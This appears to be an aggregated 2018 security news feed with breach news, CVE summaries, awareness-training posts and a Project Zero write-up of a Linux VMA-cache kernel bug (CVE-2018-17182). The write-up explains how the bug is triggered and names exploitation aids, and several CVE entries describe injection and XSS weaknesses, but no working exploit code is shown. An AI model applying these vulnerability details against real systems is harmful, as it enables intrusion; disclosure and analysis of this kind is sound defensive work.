Facebook announced on Friday that it has suffered a data breach affecting up to 50 million users. According to a report from the New York Times, Facebook discovered the attack on Tuesday and has contacted the FBI. The exploit reportedly enables attackers to take over control of accounts, so, as a precaution, the social network has automatically logged out more than 90 million potentially compromised accounts.

Source: Facebook

ATM ‘jackpotter’ sentenced to year in US prison

One of the men involved in an ATM jackpotting scheme in January this year is already facing punishment. A district court in Connecticut has sentenced Argenys Rodriguez to just over a year in prison, plus two years of supervised release and $121,355 in restitution, for collaborating on hacks that slipped malware into bank machines and forced the devices to spit out their cash. Rodriguez had pleaded guilty to bank fraud in June and will start his sentence on November 26th.

Via: Gizmodo, ZDNet

Source: Department of Justice

CVE-2018-6925 (freebsd)

In FreeBSD before 11.2-STABLE(r338986), 11.2-RELEASE-p4, 11.1-RELEASE-p15, 10.4-STABLE(r338985), and 10.4-RELEASE-p13, due to improper maintenance of IPv6 protocol control block flags through various failure paths, an unprivileged authenticated local user may be able to cause a NULL pointer dereference causing the kernel to crash.

CVE-2018-17155 (freebsd)

In FreeBSD before 11.2-STABLE(r338983), 11.2-RELEASE-p4, 11.1-RELEASE-p15, 10.4-STABLE(r338984), and 10.4-RELEASE-p13, due to insufficient initialization of memory copied to userland in the getcontext and swapcontext system calls, small amounts of kernel memory may be disclosed to userland processes. Unprivileged authenticated local users may be able to access small amounts of privileged kernel data.

CVE-2018-17154 (freebsd)

In FreeBSD before 11.2-STABLE(r338987), 11.2-RELEASE-p4, and 11.1-RELEASE-p15, due to insufficient memory checking in the freebsd4_getfsstat system call, a NULL pointer dereference can occur. Unprivileged authenticated local users may be able to cause a denial of service.

CVE-2018-1704 (platform_symphony, spectrum_symphony)

IBM Platform Symphony 7.1 Fix Pack 1 and 7.1.1 and IBM Spectrum Symphony 7.1.2 and 7.2.0.2 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 146339.

Hacker says he’ll livestream deletion of Zuckerberg’s Facebook page (updated)

A white-hat hacker briefly promised to livestream his bid to hack into Mark Zuckerberg's Facebook account on Sunday, September 30th. "Broadcasting the deletion of Facebook founder Zuck's account," Chang Chi-yuan told his 26,000-plus followers on the social network, adding: "Scheduled to go live." By Friday afternoon, the stream had been cancelled.

Via: Bloomberg

Source: Chang Chi-yuan (Facebook)

CVE-2018-17580 (tcpreplay)

A heap-based buffer over-read exists in the function fast_edit_packet() in the file send_packets.c of Tcpreplay v4.3.0 beta1. This can lead to Denial of Service (DoS) and potentially Information Exposure when the application attempts to process a crafted pcap file.

Weekly Update 106

Presently sponsored by: Netsparker - a scalable and dead accurate web application security solution. Scan thousands of web applications within just hours.


Home again! Another NDC is down, and I talk a little about how the talks were rated and about PubConf (make sure you get to one of these one day!). I've got another couple of weeks at home before any more travel, and I'll talk more about the next things as they draw closer.

This week, I'm on my new iPhone (which is very similar to my old iPhone), I'm talking about Uber getting fined, Cloudflare introducing some very cool new things, Firefox Monitor launching on top of the HIBP APIs and my newfound love for the Pi-hole. Seriously, this is a very cool bit of tech and a fun project to build for home. I'll share more over time as I get a better idea of its strengths and weaknesses but for now, yeah, just get one!


References

  1. Despite my dislike of Face ID, I've rolled over to the new iPhone Xs (that's a link through to the blog post on the dramas I was having with it)
  2. Uber got pinged $148M for their breach (their concealment of it deserves a big penalty, but there's been no personal impact from it)
  3. Cloudflare is making bandwidth cheap (the Bandwidth Alliance could be awesome for costs!)
  4. Plus, they're becoming a domain registrar (yet another way of making the platform more accessible and driving down costs)
  5. Mozilla launched Firefox Monitor (yes, it's effectively another skin on HIBP, but it massively expands the reach of the service)
  6. Pi-hole - get one! (so impressed with this little beaudy!)
  7. And here's the ad blockers blog post just for good measure (I'd really like to see a more responsible approach on their behalf)
  8. DigiCert is sponsoring my blog this week (they're really putting a lot of work into IoT security lately, check 'em out!)

CVE-2018-17573 (wp-insert)

The Wp-Insert plugin through 2.4.2 for WordPress allows upload of arbitrary PHP code because of the exposure and configuration of FCKeditor under fckeditor/editor/filemanager/browser/default/browser.html, fckeditor/editor/filemanager/connectors/test.html, and fckeditor/editor/filemanager/connectors/uploadtest.html.

“Isolated among Allies and Foes Alike” US Regime Announces Offensive Hacking Campaign

Big day in the news for international relations. The leader of the US Regime took a self-promotion campaign to the UN body and received only laughs and mockery. The Independent has sharp analysis of what the vacuum in US leadership means for global policy makers. First appearance before intergovernmental organisation after Washington cut refugee aid … Continue reading “Isolated among Allies and Foes Alike” US Regime Announces Offensive Hacking Campaign

CVE-2018-16659 (id.prove)

An issue was discovered in Rausoft ID.prove 2.95. The login page allows SQL injection via Microsoft SQL Server stacked queries in the Username POST parameter. Hypothetically, an attacker can utilize master..xp_cmdshell for further privilege elevation.

CVE-2018-14037 (kendo_ui_editor)

Cross-site scripting (XSS) vulnerability in Progress Kendo UI Editor v2018.1.221 allows remote attackers to inject arbitrary JavaScript into the DOM of the WYSIWYG editor because of the editorNS.Serializer toEditableHtml function in kendo.all.min.js. If the victim accesses the editor, the payload gets executed. Furthermore, if the payload is reflected at any other resource that does rely on the sanitisation of the editor itself, the JavaScript payload will be executed in the context of the application. This allows attackers (in the worst case) to take over user sessions.

NBlog Sept 28 – phishing awareness module imminent

Things are falling rapidly into place as the delivery deadline for October's NoticeBored awareness module on phishing looms large.

Three cool awareness poster graphics are in from the art department, and three awareness seminars are about done. 

The seminar slides and speaker notes, in turn, form the basis for accompanying awareness briefings for staff, managers and professionals, respectively.  

We also have two 'scam alert' one-pagers, plus the usual set of supporting collateral all coming along nicely - a train-the-trainer guide on how to get the best out of the new batch of materials, an awareness challenge/quiz, an extensive glossary (with a few new phishing-related terms added this month), an updated policy template, Internal Controls Questionnaire (IT audit checklist), board agenda, phishing maturity metric, and newsletter.  Lots on the go and several gaps to be plugged yet.


Today we're ploughing on, full speed ahead thanks to copious fresh coffee and Guy Garvey singing "It's all gonna be magnificent" on the office sound system to encourage us rapidly towards the end of another month's furrow.  So inspirational!  

We've drawn from at least five phishing-related reports and countless Internet sources, stitching together a patchwork of data, analysis and advice in a more coherent form that makes sense to our three audience groups. I rely on a plain text file of notes, mostly quotable paragraphs and URLs for the sources, since we always credit our sources. There are so many aspects to phishing that I'd be lost without my notes! As it is, I have a head full of stuff on the go, so I press ahead with the remaining writing or I'll either lose the plot completely or burst!

For most organizations, security awareness and training is just another thing on a long to-do list with limited resources and many competing priorities, whereas we have the benefit of our well-practiced production methods and team, and the luxury of being able to concentrate on the single topic at hand. We do have other things going on, not least running the business, feeding the animals and blogging. But today is when the next module falls neatly into place, ready to deliver and then pause briefly for breath before the next one. Our lovely customers, meanwhile, are busy running their businesses and rounding-off their awareness and training activities on 'outsider threats', September's topic. As those awareness messages sink in, October's fresh topic and new NoticeBored module will boost energy and take things up another notch, a step closer to the corporate security culture that generates genuine business returns from all this effort.

CVE-2018-1736 (websphere_portal)

IBM WebSphere Portal 7.0, 8.0, 8.5, and 9.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 147906.

CVE-2018-1660 (websphere_portal)

IBM WebSphere Portal 7.0, 8.0, 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-force ID: 144886.

CVE-2018-1820 (websphere_portal)

IBM WebSphere Portal 8.0, 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 150096.

CVE-2018-1716 (websphere_portal)

IBM WebSphere Portal 7.0, 8.0, 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 147164.

Cisco unearths 13 ‘High Impact’ IOS vulnerabilities you need to patch now

Cisco today exposed 13 vulnerabilities in its IOS and IOS XE switch and router operating software that the company said should be patched as soon as possible.

The vulnerabilities were detailed in Cisco’s twice-yearly dump of IOS exposures. All have a High Impact security rating, and fixes should be evaluated by users quickly.

The company said this particular batch of issues could let an attacker gain elevated privileges for an affected device or cause a denial of service (DoS) on an affected device.

To read this article in full, please click here

Feature, Bug or Just a Huge Security Risk? Skype for Business, Examined

Here at Heimdal Security, we spread our time between providing security tools to prevent serious attacks like ransomware or next-gen malware and providing the education necessary to keep personal data safe across various platforms and devices.

Sometimes, it becomes obvious that tools and education alone won’t keep users truly safe online, nor will they enforce their privacy. Sometimes, ubiquitous, extremely popular services release features that truly boggle the mind. Skype for Business is one of them.

This week, we discovered a serious security risk and privacy breach in the Skype for Business app. It was not related to hacking or other cyber-attacks, but to a pure “feature,” whose purpose and value we haven’t yet been able to decipher.

If you do a Skype for Business call with “screen-sharing” turned on, be prepared to share more than what you wanted.

Once the person who started screen-sharing hangs up, the desktop-sharing function will continue. The people at the other end of the line will still see what’s happening there.

If the person who had hosted the session does not notice the tiny warning at the top, they will continue sharing whatever they’re doing on the screen. Spreadsheets with sensitive financial data, inbox contents, private messages on Facebook, all of them will be seen by the other person.

Had a cybercriminal participated in a conversation like this, they would have had a field day with the info obtained. In some areas, a competitor could do serious damage with how much information they are able to see.

We thought that we had stumbled upon a serious security flaw. Imagine our surprise when, after a few seconds of Googling the issue and thinking about contacting Microsoft, we came across this thread. No, screen sharing after ending a call is a “feature, not a bug”. Never mind the fact that a regular Skype user first calls someone to start a meeting, then opens a presentation, then closes the call and assumes that the entire interaction ended.

Why would someone possibly want their screen to still be visible to the other person, even though the dialogue ended? Even if, by chance, that were the case, the tiny ribbon that lets you know screen-sharing is still on has such an unobtrusive design that a regular user will definitely miss it. For such a security-sensitive feature, you’d think neon colors were in order. Certainly, a pleasant design should not be the only priority for Skype for Business.

After all, the people using it do have plenty of sensitive information that should not leak.

Here is what the caller who initiated screen-sharing can see once he/she hangs up.

skype for business screen share issue

Here is what’s visible to the ones that just left that call. Spoiler: it’s everything the initial caller is currently doing.

skype for business share screen issue

And, finally, this is the placement of the ribbon designed to let the user know their screen is still being broadcast. It’s almost black, sitting on top of a browser bar of the same color. If someone had a secondary display and continued working on the screen with the Skype for Business window, it would be almost impossible to spot that message.

skype for business screen sharing issue

What’s worse is that this behavior has been reported plenty of times.

Microsoft’s response? “It’s an expected behavior,” said a customer representative. He followed that with an invitation to “vote for this feedback” at another link, and a recommendation to “close the Skype for Business chat window to end Skype call and screen sharing at the same time.”

Yes, the official suggestion is to close the entire window, not press the button that’s for ending the call.

Give it a bit more time, and instead of customer support flagging the bad user interface design and the developers fixing it, someone will tell you to put a sticker on your webcam if you want to stop broadcasting. That is without even mentioning what a huge GDPR infringement this Skype for Business bug is. Some experts point out that even sharing usernames in unencrypted communications or on screens can be against the General Data Protection Regulation.

 

Microsoft is not alone in this and could probably pin this one on miscommunication, not bad intentions.

What users can do is secure their devices with the essential security layers and stay updated with current news, so they can act swiftly and protect themselves and their valuable data.

The post Feature, Bug or Just a Huge Security Risk? Skype for Business, Examined appeared first on Heimdal Security Blog.

Making an Impact with Security Awareness Training: Quick Wins and Sustained Impact

Posted under: Research and Analysis

Our last post explained Continuous Contextual Content as a means to optimize the effectiveness of a security awareness program. CCC acknowledges that users won’t get it, at least not initially. That means you need to reiterate your lessons over and over (and probably over) again. But when should you do that? Optimally when their receptivity is high – when they just made a mistake.

So you determine the relative risk of users, and watch for specific actions or alerts. When you see such behavior, deliver the training within the context of what they see then. But that’s not enough. You want to track the effectiveness of your training (and your security program) to get a sense of what works and what doesn’t. If you can’t close the loop on effectiveness, you have no idea whether your efforts are working, or how to continue improving your program.

To solidify the concepts, let’s walk through a scenario step by step. Say you work for a large enterprise in the financial industry. Senior management increasingly worries about ransomware and data leakage. A recent penetration test showed that your general security controls are effective, but in their phishing simulation over half your employees clicked a fairly obvious phish. And it’s a good thing your CIO has a good sense of humor, because the pen tester gained full access to his machine via a well-crafted drive-by attack which would have worked against the entire senior team.

So your mission, should you choose to accept it, is to implement security awareness training for the company. Let’s go!

Start with Urgency

As mentioned, your company has a well-established security program, so you can hit the ground running using your existing baseline security data. Next, identify the most significant risks and take immediate action to start addressing them. Acting with urgency serves two purposes. It can give you a quick win, and we all know how important it is to show value immediately. As a secondary benefit, you can start training employees on a critical issue right away.

Your pen test showed that phishing poses the worst problems for your organization, so that’s where you should focus initial efforts. Given the high-level support for the program, you cajole your CEO into recording a video discussing the results of the phishing test and the importance of fixing the issue. A message like this helps everyone understand the urgency of addressing the problem and that the CEO will be watching.

Following that, every employee completes a series of five 3-5 minute training videos walking them through the basics of email security, with a required test at the end. Of course it’s hard to get 100% participation in anything, so you’ve already established consequences for those who choose not to complete the requirement. And the security team is available to help people who have a hard time passing.

It’s a balance between being overly heavy-handed and the importance of training users to defend themselves. You need to ensure employees know about the ongoing testing program, and that they’ll be tested periodically. That’s the continuous part of the approach – it’s not a one-time thing.

Introduce Contextual Training

As you execute on your initial phishing training effort, you also start to integrate your security awareness training platform with existing email, web, and DNS security services. This integration involves receiving an alert when an employee clicks a phishing message, automatically signing them up for training, and delivering a short (2-3 minute) refresher on email security. Of course contextual training requires flexibility, because an employee might be in the middle of a critical task. But you can establish an expectation that a vulnerable employee needs to complete training that day.

Similarly, if an employee navigates to a known malicious site, the web security service sends a trigger, and the web security refresher runs for that employee. The key is to make sure the interruption is both contextual and quick. The employee did this, so they need training immediately. Even a short delay will reduce the training’s effectiveness.
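To make the mechanics concrete, here is a minimal sketch of the glue code either trigger might need: a webhook that accepts a click alert from an email or web security service and enrolls the offending employee in a short refresher module. Every endpoint, field, and module name below is hypothetical; real awareness platforms and security gateways each have their own APIs.

# Minimal sketch of an alert-to-training integration.
# All endpoints and field names are hypothetical.
from flask import Flask, request
import requests

app = Flask(__name__)

# Hypothetical training platform endpoint; substitute your vendor's API.
TRAINING_API = "https://training.example.internal/api/enroll"

@app.route("/hooks/phish-click", methods=["POST"])
def phish_click():
    alert = request.get_json()
    # Enroll the user who clicked in a short, contextual refresher,
    # due the same day so the lesson stays close to the mistake.
    requests.post(TRAINING_API, json={
        "user": alert["user_email"],           # hypothetical alert field
        "module": "email-security-refresher",  # the 2-3 minute module
        "due": "end-of-day",
        "context": alert.get("url"),           # what they actually clicked
    }, timeout=10)
    return "", 204

The same handler pattern covers the web security trigger; only the alert source and the refresher module change.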

Additionally, you’ll be running ongoing training and simulations with employees. You’ll perform some analysis to pinpoint the employees who can’t seem to stop clicking things. These employees can get more intensive training, and escalation if they continue to violate corporate policies and put data at risk.

Overhaul Onboarding

After initial triage and integration with your security controls, you’ll work with HR to overhaul the training delivered during their onboarding process. You are now training employees continuously, so you don’t need to spend 3 hours teaching them about phishing and the hazards of clicking links.

Then onboarding can shift, to focus on establishing a culture of security from Day 1. This entails educating new employees on online and technology policies, and acceptable use expectations. You also have an opportunity to set expectations for security awareness training. Make clear that employees will be tested on an ongoing basis, and inform them who sees the results (their managers, etc.), along with the consequences of violating acceptable use policies.

Again, a fine line exists between being draconian and setting clear expectations. If the consequences have teeth (as they should), employees must know, and sign off on their understanding. We also recommend you test each new employee within a month of their start date to ensure they comprehend security expectations and have retained their initial lessons.

Start a Competition

Once your program settles in over six months or so, it’s time to shake things up again. You can set up a competition, inviting the company to compete for the Chairperson’s Security Prize. Yes, you need to get the Chairperson on board for this, but that’s usually pretty easy because it helps the company. The prize needs to be impactful, and more than bragging rights. Maybe you can offer the winning department an extra day of holiday for the year. And a huge trophy. Teams love to compete for trophies they can display prominently in their area.

You’ll set the ground rules, including an internal red team and hunting team attacking each group. You’ll be tracking how many employees fall for the attacks and how many report the issues. Your teams can try physically breaching the facilities as well. You want the attacks to dovetail with ongoing security training and testing initiatives to reinforce security culture.

Run Another Simulation

You’ll also want to stage a widespread simulation a few months after the initial foray. Yes, you’ll be continuously testing employees as part of your continuous program. But getting a sense of company-wide results is also helpful. You should compare results from the initial test against the new results. Are fewer employees falling for the ruse? Are more reporting spammy and phishing emails to the central group? Ensuring the trend lines are moving in the right direction boosts the program and helps justify ongoing investment. You feed the results into the team scoring of the competition.
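Closing that loop is simple arithmetic. A toy comparison of two simulation rounds (the numbers are invented for illustration) shows the two trend lines worth reporting:

# Toy comparison of two phishing-simulation rounds (invented numbers).
baseline = {"sent": 5000, "clicked": 2600, "reported": 300}
latest   = {"sent": 5000, "clicked": 1100, "reported": 950}

for label, r in (("baseline", baseline), ("latest", latest)):
    print("%-8s click rate %5.1f%%  report rate %5.1f%%" % (
        label, 100.0 * r["clicked"] / r["sent"],
        100.0 * r["reported"] / r["sent"]))

Click rate falling while report rate rises is exactly the pattern that justifies ongoing investment.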

Lather, Rinse, Repeat

At some point, when another high-profile issue presents itself, you should take a similar approach. Let’s say your organization does a lot of business in Europe, so GDPR presents significant risk. You’ll want to train employees on how you define customer data and how to handle it.

Next determine whether you need special training for this issue, or whether you can integrate it into your more extensive semi-annual training for all employees. Every six months all employees sit for perhaps an hour, watching an update on both new hacker tactics and changes to corporate security policies.

Once that round of training completes, you will roll out new tests to highlight how customer data could be lost or stolen. Factor the new tests into your next competition as well, to keep focus on the changing nature of security and the ongoing contest.

Sustaining Impact

Once your program is humming along, we suggest you pick a new high priority topic every six months to make that the focus of your semi-annual scheduled training. As part of addressing this new topic, you’ll integrate with the relevant controls to enable ongoing contextual training and perform an initial test (to establish a baseline), and then track improvement over time.

You’ll also want a more comprehensive set of reports to track the effectiveness of your awareness training; deliver this information to senior management, and perhaps the audit committee. Maybe each quarter you’ll report on how much contextual training employees received, and how often they repeated mistakes after training. You’ll also want to report on the overall number of successful attacks, alongside trends of which attacks worked and which got blocked. Being able to map those results back to training topics makes an excellent case for ongoing investment.

At some point the competition will end and you’ll crown the winner. We suggest making a big deal of the winning team. Maybe you can record the award ceremony with the chairperson and memorialize their victory in the company newsletter. You want to make sure all employees understand security is essential and visible at the highest echelons of your organization.

It’s a journey, not a destination, so ensure consistency in your program. Add new focus topics to extend your employee knowledge, keep your content current and interesting, and hold your employees to a high standard – make sure they understand expectations and the consequences of violating corporate policies. Building a security culture requires patience, persistence, and accountability. Anchoring your security awareness training program with continuous, contextual content will go a long way to establishing such a security culture.

With that we wrap up this series on Making an Impact with Security Awareness Training. Thanks again to Mimecast for licensing this content, and we’ll have the assembled and edited paper available in our Research Library within a couple weeks.

- Mike Rothman

Do You Suffer From Breach Optimism Bias?

If you’ve been in the information security field for at least a year, you’ve undoubtedly heard your organization defend the lack of investment in, change to or optimization of a cybersecurity policy, mitigating control or organizational belief. This “It hasn’t happened to us so it likely won’t happen” mentality is called optimism bias, and it’s an issue in our field that predates the field itself.

Read my full article over at Forbes.com.

Best security software: How 20 cutting-edge tools tackle today’s threats

Threats are constantly evolving and, just like everything else, tend to follow certain trends. Whenever a new type of threat is especially successful or profitable, many others of the same type will inevitably follow. The best defenses need to mirror those trends so users get the most robust protection against the newest wave of threats. Along those lines, Gartner has identified the most important categories in cybersecurity technology for the immediate future.

We wanted to dive into the newest cybersecurity products and services from those hot categories that Gartner identified, reviewing some of the most innovative and useful from each group. Our goal is to discover how cutting-edge cybersecurity software fares against the latest threats, hopefully helping you to make good technology purchasing decisions.

To read this article in full, please click here

F-Secure Freedome review: A VPN with some built-in antivirus features

F-Secure Freedome in brief:

  • P2P allowed: No
  • Business location: Finland
  • Number of servers:  N/A
  • Number of country locations: 22
  • Cost: $50-$80 per year
  • VPN protocol: OpenVPN
  • Data encryption: AES 128-bit
  • Data authentication: AES 128-bit
  • Handshake encryption: 2048-bit RSA keys with SHA-256 certificates

There are a few VPN services that offer their own antivirus: one is Avira Phantom VPN Pro, which we looked at previously; Finland-based F-Secure is another. The company’s Freedome VPN is a premium service that offers 22 country locations around the world and extra freebies like tracker and malicious-site blocking.

To read this article in full, please click here

Extreme Ownership – Enterprise Security Weekly #108

This week, Paul and Matt Alderman talk about Threat and Vulnerability management, and how Cloud and Application security's impact on vendors can help with integration in the Enterprise! In the Enterprise News this week, Bomgar to be renamed BeyondTrust after acquisition, Attivo brings cyber security deception to containers and serverless, Symantec extends data loss prevention platform with DRM, ExtraHop announces the availability of Reveal(x) for Azure, and Cloud Native applications are at risk from Zero Touch attacks! All that and more on this episode of Enterprise Security Weekly!

 

Full Show Notes: https://wiki.securityweekly.com/ES_Episode108

 

Visit https://www.securityweekly.com/esw for all the latest episodes!

 

Visit https://www.activecountermeasures.com/esw to sign up for a demo or buy our AI Hunter!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Jaywalking is a Fantasy Crime

Brilliant comedy routine by Hannibal Buress. Humor helps underscore a very real problem with jaywalking laws, one any historian should be able to tell you about: what sets jaywalking apart is that it never should have been against the law in the first place. City streets were meant for foot traffic and horses from ancient times … Continue reading Jaywalking is a Fantasy Crime

Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish

Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.


Category:

CTU Research

Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.

CVE-2018-16711 (advanced_systemcare)

IObit Advanced SystemCare, which includes Monitor_win10_x64.sys or Monitor_win7_x64.sys, 1.2.0.5 (and possibly earlier versions) allows a user to send an IOCTL (0x9C402088) with a buffer containing user defined content. The driver's subroutine will execute a wrmsr instruction with the user's buffer for input.

CVE-2018-16588 (shadow)

Privilege escalation can occur in the SUSE useradd.c code in useradd, as distributed in the SUSE shadow package through 4.2.1-27.9.1 for SUSE Linux Enterprise 12 (SLE-12) and through 4.5-5.39 for SUSE Linux Enterprise 15 (SLE-15). Non-existing intermediate directories are created with mode 0777 during user creation. Given that they are world-writable, local attackers might use this for privilege escalation and other unspecified attacks. NOTE: this would affect non-SUSE users who took useradd.c code from a 2014-04-02 upstream pull request; however, no non-SUSE distribution is known to be affected.

NBlog Sept 27 – from weariness via wariness to awareness

Weary of the same old stuff, day after day?  Wary of over-blown threats, confusing security controls and crude "Do it or else!" compliance demands blasted out repeatedly and loudly in the vain hope some might just stick?

Us too! Those are common issues in awareness and training, betraying a lack of appreciation and respect for the audience. We can do better. 

No really, we must.

Awareness and training leading to understanding and genuine support for security is the NoticeBored way. We take the trouble to pick apart complex issues such as phishing and pharming, explaining them straightforwardly with plenty of diagrams and examples to inform, engage and motivate three distinct audiences. We spend at least as much time exploring the broader context to the issues, explaining why they are of concern, as we do telling people how to respond, what to do and not to do. We are addressing intelligent adults through soundly-researched content, professionally crafted for this specific purpose.

There's more to this than meets the eye. More Haynes manuals and exploded parts diagrams than childish cartoons or death-by-PowerPoint bullet points.

NoticeBored shines through topics such as phishing. Social engineers, identity thieves and other fraudsters are actively innovating, constantly on the search for new tricks to phool even wary victims. We can only get so far by talking about previous and current attacks because there's something new on the way tomorrow or the day after. Future-proofing requires a deeper appreciation of our adversaries' motivation and techniques ... which is part of the awareness challenge. 'Think like a phisher' is much easier said than done. On top of that, we must remain ethical, steering well clear of accidentally encouraging people to become phishers!  

Right there is an example of an information risk that few organizations even consider - not so much inept awareness and training as the possibility of phishing being committed by insiders against their colleagues and employer. Having covered insider threats and outsider threats in the previous two months, we have laid the foundation to take things up a level in October's NoticeBored module.

Enough blogging: must dash. I have to 'revalidate my login' to avoid losing my email account, again ... 

CVE-2018-17215 (postman)

An information-disclosure issue was discovered in Postman through 6.3.0. It validates a server's X.509 certificate and presents an error if the certificate is not valid. Unfortunately, the associated HTTPS request data is sent anyway. Only the response is not displayed. Thus, all contained information of the HTTPS request is disclosed to a man-in-the-middle attacker (for example, user credentials).

CVE-2018-8850 (e-alert_firmware)

Philips e-Alert Unit (non-medical device), Version R2.1 and prior. The software does not validate input properly, allowing an attacker to craft the input in a form that is not expected by the rest of the application. This would lead to parts of the unit receiving unintended input, which may result in altered control flow, arbitrary control of a resource, or arbitrary code execution.

CVE-2018-14803 (e-alert_firmware)

Philips e-Alert Unit (non-medical device), Version R2.1 and prior. The Philips e-Alert contains a banner disclosure vulnerability that could allow attackers to obtain extraneous product information, such as OS and software components, via the HTTP response header that is normally not available to the attacker, but might be useful information in an attack.

CVE-2018-8842 (e-alert_firmware)

Philips e-Alert Unit (non-medical device), Version R2.1 and prior. The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. The Philips e-Alert communication channel is not encrypted which could therefore lead to disclosure of personal contact information and application login credentials from within the same subnet.

Uber will pay $148 million for 2016 data breach coverup

Last year, reports surfaced that Uber had been hit with a data breach, but instead of reporting it to the government or to those affected, it chose to cover it up. Now, the company will pay $148 million as part of a settlement, and the money will be distributed among the US states and Washington, DC. After the hack and Uber's response to it became public, a number of states launched investigations into the incident while others filed lawsuits.

Via: CNBC

Source: New York Attorney General

A cache invalidation bug in Linux memory management

Posted by Jann Horn, Google Project Zero

This blogpost describes a way to exploit a Linux kernel bug (CVE-2018-17182) that has existed since kernel version 3.16. While the bug itself is in code that is reachable even from relatively strongly sandboxed contexts, this blogpost only describes a way to exploit it in environments that use Linux kernels that haven't been configured for increased security (specifically, Ubuntu 18.04 with kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37). This demonstrates how the kernel configuration can have a big impact on the difficulty of exploiting a kernel bug.

The bug report and the exploit are filed in our issue tracker as issue 1664.

Fixes for the issue are in the upstream stable releases 4.18.9, 4.14.71, 4.9.128, 4.4.157 and 3.16.58.

The bug

Whenever a userspace page fault occurs because e.g. a page has to be paged in on demand, the Linux kernel has to look up the VMA (virtual memory area; struct vm_area_struct) that contains the fault address to figure out how the fault should be handled. The slowpath for looking up a VMA (in find_vma()) has to walk a red-black tree of VMAs. To avoid this performance hit, Linux also has a fastpath that can bypass the tree walk if the VMA was recently used.

The implementation of the fastpath has changed over time; since version 3.15, Linux uses per-thread VMA caches with four slots, implemented in mm/vmacache.c and include/linux/vmacache.h. Whenever a successful lookup has been performed through the slowpath, vmacache_update() stores a pointer to the VMA in an entry of the array current->vmacache.vmas, allowing the next lookup to use the fastpath.

Note that VMA caches are per-thread, but VMAs are associated with a whole process (more precisely with a struct mm_struct; from now on, this distinction will largely be ignored, since it isn't relevant to this bug). Therefore, when a VMA is freed, the VMA caches of all threads must be invalidated - otherwise, the next VMA lookup would follow a dangling pointer. However, since a process can have many threads, simply iterating through the VMA caches of all threads would be a performance problem.

To solve this, both the struct mm_struct and the per-thread struct vmacache are tagged with sequence numbers; when the VMA lookup fastpath discovers in vmacache_valid() that current->vmacache.seqnum and current->mm->vmacache_seqnum don't match, it wipes the contents of the current thread's VMA cache and updates its sequence number.

The sequence numbers of the mm_struct and the VMA cache were only 32 bits wide, meaning that it was possible for them to overflow. To ensure that a VMA cache can't incorrectly appear to be valid when current->mm->vmacache_seqnum has actually been incremented 2^32 times, vmacache_invalidate() (the helper that increments current->mm->vmacache_seqnum) had a special case: When current->mm->vmacache_seqnum wrapped to zero, it would call vmacache_flush_all() to wipe the contents of all VMA caches associated with current->mm. Executing vmacache_flush_all() was very expensive: It would iterate over every thread on the entire machine, check which struct mm_struct it is associated with, then if necessary flush the thread's VMA cache.
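For illustration, here is a toy model (in Python, not kernel code) of that comparison; it shows why the wrap needs special handling: once the 32-bit counter comes full circle, a stale cache appears valid again.

# Toy model of the 32-bit sequence-number comparison (not kernel code).
MASK = 0xffffffff

cache_seqnum = 0xffffffff  # per-thread cache, still holding stale pointers
mm_seqnum = 0xffffffff     # shared per-mm counter

def vmacache_valid_model():
    # the real vmacache_valid() compares the two counters the same way
    return cache_seqnum == mm_seqnum

mm_seqnum = (mm_seqnum + 1) & MASK     # invalidation: counter wraps to 0
assert not vmacache_valid_model()      # stale cache correctly rejected

mm_seqnum = (mm_seqnum + MASK) & MASK  # 2**32 - 1 further invalidations
assert vmacache_valid_model()          # stale cache wrongly valid again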

In version 3.16, an optimization was added: If the struct mm_struct was only associated with a single thread, vmacache_flush_all() would do nothing, based on the realization that every VMA cache invalidation is preceded by a VMA lookup; therefore, in a single-threaded process, the VMA cache's sequence number is always close to the mm_struct's sequence number:

/*
* Single threaded tasks need not iterate the entire
* list of process. We can avoid the flushing as well
* since the mm's seqnum was increased and don't have
* to worry about other threads' seqnum. Current's
* flush will occur upon the next lookup.
*/
if (atomic_read(&mm->mm_users) == 1)
return;

However, this optimization is incorrect because it doesn't take into account what happens if a previously single-threaded process creates a new thread immediately after the mm_struct's sequence number has wrapped around to zero. In this case, the sequence number of the first thread's VMA cache will still be 0xffffffff, and the second thread can drive the mm_struct's sequence number up to 0xffffffff again. At that point, the first thread's VMA cache, which can contain dangling pointers, will be considered valid again, permitting the use of freed VMA pointers in the first thread's VMA cache.

The bug was fixed by changing the sequence numbers to 64 bits, thereby making an overflow infeasible, and removing the overflow handling logic.

Reachability and Impact

Fundamentally, this bug can be triggered by any process that can run for a sufficiently long time to overflow the 32-bit sequence number (about an hour if MAP_FIXED is usable) and has the ability to use mmap()/munmap() (to manage memory mappings) and clone() (to create a thread). These syscalls do not require any privileges, and they are often permitted even in seccomp-sandboxed contexts, such as the Chrome renderer sandbox (mmap, munmap, clone), the sandbox of the main gVisor host component, and Docker's seccomp policy.

To make things easy, my exploit uses various other kernel interfaces, and therefore doesn't just work from inside such sandboxes; in particular, it uses /dev/kmsg to read dmesg logs and uses an eBPF array to spam the kernel's page allocator with user-controlled, mutable single-page allocations. However, an attacker willing to invest more time into an exploit would probably be able to avoid using such interfaces.

